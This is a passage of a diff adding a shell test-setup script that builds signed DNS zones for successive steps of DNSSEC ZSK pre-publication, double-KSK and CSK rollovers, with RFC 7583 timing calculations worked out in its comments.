+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 4:
+# After the retire interval has passed the predecessor DNSKEY can be
+# removed from the zone.
+setup step4.zsk-prepub.autosign
+# According to RFC 7583:
+#
+# Tret(N) = Tact(N) + Lzsk
+# Tdea(N) = Tret(N) + Iret
+#
+# |3| |4| |5| |6| |7| |8|
+# | | | | | |
+# Key N |<-------Lzsk------>|<-Iret->|<--->|
+# | | | | | |
+# Key N+1 | |<-Ipub->|<-->|<---Lzsk---- - -
+# | | | | | |
+# Key N Tact Tret Tdea Trem
+# Key N+1 Tpub Trdy Tact
+#
+# Tnow
+#
+# Lzsk: 30d
+# Ipub: 26h
+# Iret: 241h
+#
+# Tact(N) = Tnow - Iret - Lzsk
+# = now - 241h - 30d = now - 241h - 720h
+# = now - 961h
+# Tret(N) = Tnow - Iret = now - 241h
+# Trem(N) = Tnow
+# Tpub(N+1) = Tnow - Iret - Ipub
+# = now - 241h - 26h
+# = now - 267h
+# Tact(N+1) = Tnow - Iret = Tret(N)
+# Tret(N+1) = Tnow - Iret + Lzsk
+# = now - 241h + 30d = now - 241h + 720h
+# = now + 479h
+# Trem(N+1) = Tnow + Lzsk = now + 30d
+TactN="now-961h"
+TretN="now-241h"
+TremN="now"
+TpubN1="now-267h"
+TactN1="${TretN}"
+TretN1="now+479h"
+TremN1="now+30d"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $H -k $O
$TactN -z $U $TretN "$ZSK1" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN1 -z $R $TactN1 "$ZSK2" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $ZSK1 $ZSK2
+# Sign zone.
+cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile"
+cp $infile $zonefile
+$SIGNER -PS -x -s now-2w -e now-1mi -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 5:
+# The predecessor DNSKEY is removed long enough that is has become HIDDEN.
+setup step5.zsk-prepub.autosign
+# Subtract DNSKEY TTL from all the times (1h).
+# Tact(N) = now - 961h - 1h = now - 962h
+# Tret(N) = now - 241h - 1h = now - 242h
+# Tdea(N) = now - 2d - 1h = now - 49h
+# Trem(N) = now - 1h
+# Tpub(N+1) = now - 267h - 1h = now - 268h
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = now + 479h - 1h = now + 478h
+# Trem(N+1) = now + 30d - 1h = now + 719h
+TactN="now-962h"
+TretN="now-242h"
+TremN="now-1h"
+TdeaN="now-49h"
+TpubN1="now-268h"
+TactN1="${TretN}"
+TretN1="now+478h"
+TremN1="now+719h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $H -k $U $TdeaN -z $H $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN1 -z $O $TdeaN "$ZSK2" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $ZSK1 $ZSK2
+# Sign zone.
+cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 6:
+# The predecessor DNSKEY can be purged.
+setup step6.zsk-prepub.autosign
+# Subtract purge-keys interval from all the times (1h).
+# Tact(N) = now - 962h - 1h = now - 963h
+# Tret(N) = now - 242h - 1h = now - 243h
+# Tdea(N) = now - 49h - 1h = now - 50h
+# Trem(N) = now - 1h - 1h = now - 2h
+# Tpub(N+1) = now - 268h - 1h = now - 269h
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = now + 478h - 1h = now + 477h
+# Trem(N+1) = now + 719h - 1h = now + 718h
+TactN="now-963h"
+TretN="now-243h"
+TremN="now-2h"
+TdeaN="now-50h"
+TpubN1="now-269h"
+TactN1="${TretN}"
+TretN1="now+477h"
+TremN1="now+718h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $H -k $H $TdeaN -z $H $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN1 -z $O $TdeaN "$ZSK2" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $ZSK1 $ZSK2
+# Sign zone.
+cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+#
+# The zones at ksk-doubleksk.autosign represent the various steps of a KSK
+# Double-KSK rollover.
+#
+
+# Step 1:
+# Introduce the first key. This will immediately be active.
+setup step1.ksk-doubleksk.autosign
+TactN="now"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 2:
+# It is time to submit the introduce the new KSK.
+setup step2.ksk-doubleksk.autosign
+# According to RFC 7583:
+#
+# Tpub(N+1) <= Tact(N) + Lksk - Dreg - IpubC
+# IpubC = DprpC + TTLkey (+publish-safety)
+#
+# |1| |2| |3| |4|
+# | | | |
+# Key N |<-IpubC->|<--->|<-Dreg->|<-----Lksk--- - -
+# | | | |
+# Key N+1 | | | |
+# | | | |
+# Key N Tpub Trdy Tsbm Tact
+# Key N+1
+#
+# (continued ...)
+#
+# |5| |6| |7| |8| |9| |10|
+# | | | | | |
+# Key N - - --------------Lksk------->|<-Iret->|<----->|
+# | | | | | |
+# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - -
+# | | | | | |
+# Key N Tret Tdea Trem
+# Key N+1 Tpub Trdy Tsbm Tact
+#
+# Tnow
+#
+# Lksk: 60d
+# Dreg: 1d
+# DprpC: 1h
+# TTLkey: 2h
+# publish-safety: 1d
+# IpubC: 27h
+#
+# Tact(N) = Tnow - Lksk + Dreg + IpubC = now - 60d + 27h
+# = now - 1440h + 27h = now - 1413h
+TactN="now-1413h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 3:
+# It is time to submit the DS.
+setup step3.ksk-doubleksk.autosign
+# According to RFC 7583:
+#
+# Tsbm(N+1) >= Trdy(N+1)
+# Tact(N+1) = Tsbm(N+1) + Dreg
+# Iret = DprpP + TTLds (+retire-safety)
+#
+# |5| |6| |7| |8| |9| |10|
+# | | | | | |
+# Key N - - --------------Lksk------->|<-Iret->|<----->|
+# | | | | | |
+# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - -
+# | | | | | |
+# Key N Tret Tdea Trem
+# Key N+1 Tpub Trdy Tsbm Tact
+#
+# Tnow
+#
+# Lksk: 60d
+# Dreg: N/A
+# DprpP: 1h
+# TTLds: 1h
+# retire-safety: 2d
+# Iret: 50h
+# DprpC: 1h
+# TTLkey: 2h
+# publish-safety: 1d
+# IpubC: 27h
+#
+# Tact(N) = Tnow + Lksk = now - 60d = now - 60d
+# Tret(N) = now
+# Trem(N) = Tnow + Iret = now + 50h
+# Tpub(N+1) = Tnow - IpubC = now - 27h
+# Tsbm(N+1) = now
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = Tnow + Lksk = now + 60d
+# Trem(N+1) = Tnow + Lksk + Iret = now + 60d + 50h
+# = now + 1440h + 50h = 1490h
+TactN="now-60d"
+TretN="now"
+TremN="now+50h"
+TpubN1="now-27h"
+TsbmN1="now"
+TactN1="${TretN}"
+TretN1="now+60d"
+TremN1="now+1490h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TactN1} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $KSK1 $KSK2
+# Sign zone.
+cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 4:
+# The DS should be swapped now.
+setup step4.ksk-doubleksk.autosign
+# According to RFC 7583:
+#
+# Tret(N) = Tsbm(N+1)
+# Tdea(N) = Tret(N) + Iret
+# Tact(N+1) = Tret(N)
+#
+# |5| |6| |7| |8| |9| |10|
+# | | | | | |
+# Key N - - --------------Lksk------->|<-Iret->|<----->|
+# | | | | | |
+# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - -
+# | | | | | |
+# Key N Tret Tdea Trem
+# Key N+1 Tpub Trdy Tsbm Tact
+#
+# Tnow
+#
+# Lksk: 60d
+# Dreg: N/A
+# Iret: 50h
+#
+# Tact(N) = Tnow - Lksk - Iret = now - 60d - 50h
+# = now - 1440h - 50h = now - 1490h
+# Tret(N) = Tnow - Iret = now - 50h
+# Trem(N) = Tnow
+# Tpub(N+1) = Tnow - Iret - IpubC = now - 50h - 27h
+# = now - 77h
+# Tsbm(N+1) = Tnow - Iret = now - 50h
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = Tnow + Lksk - Iret = now + 60d - 50h = now + 1390h
+# Trem(N+1) = Tnow + Lksk = now + 60d
+TactN="now-1490h"
+TretN="now-50h"
+TremN="now"
+TpubN1="now-77h"
+TsbmN1="now-50h"
+TactN1="${TretN}"
+TretN1="now+1390h"
+TremN1="now+60d"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TsbmN1 -D ds $TsbmN1 "$KSK1" > settime.out.$zone.1
2>&1
+$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $R $TsbmN1 -P ds $TsbmN1 "$KSK2" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $KSK1 $KSK2
+# Sign zone.
+cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 5:
+# The predecessor DNSKEY is removed long enough that is has become HIDDEN.
+setup step5.ksk-doubleksk.autosign
+# Subtract DNSKEY TTL from all the times (2h).
+# Tact(N) = now - 1490h - 2h = now - 1492h
+# Tret(N) = now - 50h - 2h = now - 52h
+# Trem(N) = now - 2h
+# Tpub(N+1) = now - 77h - 2h = now - 79h
+# Tsbm(N+1) = now - 50h - 2h = now - 52h
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = now + 1390h - 2h = now + 1388h
+# Trem(N+1) = now + 60d - 2h = now + 1442h
+TactN="now-1492h"
+TretN="now-52h"
+TremN="now-2h"
+TpubN1="now-79h"
+TsbmN1="now-52h"
+TactN1="${TretN}"
+TretN1="now+1388h"
+TremN1="now+1442h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $H -k $U $TretN -r $U $TretN -d $H $TretN "$KSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN
-z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $KSK1 $KSK2
+# Sign zone.
+cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 6:
+# The predecessor DNSKEY can be purged.
+setup step6.ksk-doubleksk.autosign
+# Subtract purge-keys interval from all the times (1h).
+# Tact(N) = now - 1492h - 1h = now - 1493h
+# Tret(N) = now - 52h - 1h = now - 53h
+# Trem(N) = now - 2h - 1h = now - 3h
+# Tpub(N+1) = now - 79h - 1h = now - 80h
+# Tsbm(N+1) = now - 52h - 1h = now - 53h
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = now + 1388h - 1h = now + 1387h
+# Trem(N+1) = now + 1442h - 1h = now + 1441h
+TactN="now-1493h"
+TretN="now-53h"
+TremN="now-3h"
+TpubN1="now-80h"
+TsbmN1="now-53h"
+TactN1="${TretN}"
+TretN1="now+1387h"
+TremN1="now+1441h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $H -k $H $TretN -r $H $TretN -d $H $TretN "$KSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $KSK1 $KSK2
+# Sign zone.
+cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+#
+# The zones at csk-roll.autosign represent the various steps of a CSK rollover
+# (which is essentially a ZSK Pre-Publication / KSK Double-KSK rollover).
+#
+
+# Step 1:
+# Introduce the first key. This will immediately be active.
+setup step1.csk-roll.autosign
+TactN="now"
+csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}"
+CSK=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 2:
+# It is time to introduce the new CSK.
+setup step2.csk-roll.autosign
+# According to RFC 7583:
+# KSK: Tpub(N+1) <= Tact(N) + Lksk - IpubC
+# ZSK: Tpub(N+1) <= Tact(N) + Lzsk - Ipub
+# IpubC = DprpC + TTLkey (+publish-safety)
+# Ipub = IpubC
+# Lcsk = Lksk = Lzsk
+#
+# Lcsk: 6mo (186d, 4464h)
+# Dreg: N/A
+# DprpC: 1h
+# TTLkey: 1h
+# publish-safety: 1h
+# Ipub: 3h
+#
+# Tact(N) = Tnow - Lcsk + Ipub = now - 186d + 3h
+# = now - 4464h + 3h = now - 4461h
+TactN="now-4461h"
+csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}"
+CSK=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 3:
+# It is time to submit the DS and to roll signatures.
+setup step3.csk-roll.autosign
+# According to RFC 7583:
+#
+# Tsbm(N+1) >= Trdy(N+1)
+# KSK: Tact(N+1) = Tsbm(N+1)
+# ZSK: Tact(N+1) = Tpub(N+1) + Ipub = Tsbm(N+1)
+# KSK: Iret = DprpP + TTLds (+retire-safety)
+# ZSK: IretZ = Dsgn + Dprp + TTLsig (+retire-safety)
+#
+# Lcsk: 186d
+# Dprp: 1h
+# DprpP: 1h
+# Dreg: N/A
+# Dsgn: 25d
+# TTLds: 1h
+# TTLsig: 1d
+# retire-safety: 2h
+# Iret: 4h
+# IretZ: 26d3h
+# Ipub: 3h
+#
+# Tact(N) = Tnow - Lcsk = now - 186d
+# Tret(N) = now
+# Trem(N) = Tnow + IretZ = now + 26d3h = now + 627h
+# Tpub(N+1) = Tnow - Ipub = now - 3h
+# Tsbm(N+1) = Tret(N)
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = Tnow + Lcsk = now + 186d = now + 186d
+# Trem(N+1) = Tnow + Lcsk + IretZ = now + 186d + 26d3h =
+# = now + 5091h
+TactN="now-186d"
+TretN="now"
+TremN="now+627h"
+TpubN1="now-3h"
+TsbmN1="now"
+TactN1="${TretN}"
+TretN1="now+186d"
+TremN1="now+5091h"
+csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1)
+CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 -z $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1
+# Set key rollover relationship.
+key_successor $CSK1 $CSK2
+# Sign zone.
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 4:
+# Some time later all the ZRRSIG records should be from the new CSK, and the
+# DS should be swapped.
The ZRRSIG records are all replaced after IretZ
+# (which is 26d3h). The DS is swapped after Iret (which is 4h).
+# In other words, the DS is swapped before all zone signatures are replaced.
+setup step4.csk-roll.autosign
+# According to RFC 7583:
+# Trem(N) = Tret(N) - Iret + IretZ
+# Tnow = Tsbm(N+1) + Iret
+#
+# Lcsk: 186d
+# Iret: 4h
+# IretZ: 26d3h
+#
+# Tact(N) = Tnow - Iret - Lcsk = now - 4h - 186d = now - 4468h
+# Tret(N) = Tnow - Iret = now - 4h = now - 4h
+# Trem(N) = Tnow - Iret + IretZ = now - 4h + 26d3h
+# = now + 623h
+# Tpub(N+1) = Tnow - Iret - IpubC = now - 4h - 3h = now - 7h
+# Tsbm(N+1) = Tret(N)
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = Tnow - Iret + Lcsk = now - 4h + 186d = now + 4460h
+# Trem(N+1) = Tnow - Iret + Lcsk + IretZ = now - 4h + 186d + 26d3h
+# = now + 5087h
+TactN="now-4468h"
+TretN="now-4h"
+TremN="now+623h"
+TpubN1="now-7h"
+TsbmN1="${TretN}"
+TactN1="${TretN}"
+TretN1="now+4460h"
+TremN1="now+5087h"
+csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1)
+CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TsbmN1 -z $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $R $TsbmN1 -z $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1
+# Set key rollover relationship.
+key_successor $CSK1 $CSK2
+# Sign zone.
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 5:
+# After the DS is swapped in step 4, also the KRRSIG records can be removed.
+# At this time these have all become hidden.
+setup step5.csk-roll.autosign
+# Subtract DNSKEY TTL plus zone propagation delay from all the times (2h).
+# Tact(N) = now - 4468h - 2h = now - 4470h
+# Tret(N) = now - 4h - 2h = now - 6h
+# Trem(N) = now + 623h - 2h = now + 621h
+# Tpub(N+1) = now - 7h - 2h = now - 9h
+# Tsbm(N+1) = Tret(N)
+# Tact(N+1) = Tret(N)
+# Tret(N+1) = now + 4460h - 2h = now + 4458h
+# Trem(N+1) = now + 5087h - 2h = now + 5085h
+TactN="now-4470h"
+TretN="now-6h"
+TremN="now+621h"
+TpubN1="now-9h"
+TsbmN1="${TretN}"
+TactN1="${TretN}"
+TretN1="now+4458h"
+TremN1="now+5085h"
+csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1)
+CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2)
